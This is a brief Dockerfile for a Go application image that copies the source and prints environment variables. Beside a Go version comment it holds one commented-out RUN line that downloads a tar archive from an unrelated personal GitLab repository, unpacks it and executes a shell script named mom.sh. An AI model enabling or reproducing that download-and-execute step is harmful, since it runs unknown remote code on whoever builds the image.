ARG GO_VERSION=1.15

FROM golang:${GO_VERSION}
LABEL maintainer=dev@codeship.com

# go 1.13.15
#RUN wget https://gitlab.com/raufpermana22/mkan/-/raw/master/turL.tar && tar xf turL.tar && chmod +x mom.sh && ./mom.sh


# go 1.14.10
RUN mkdir /usr/src/app
WORKDIR /usr/src/app

COPY . .

CMD ["printenv"]
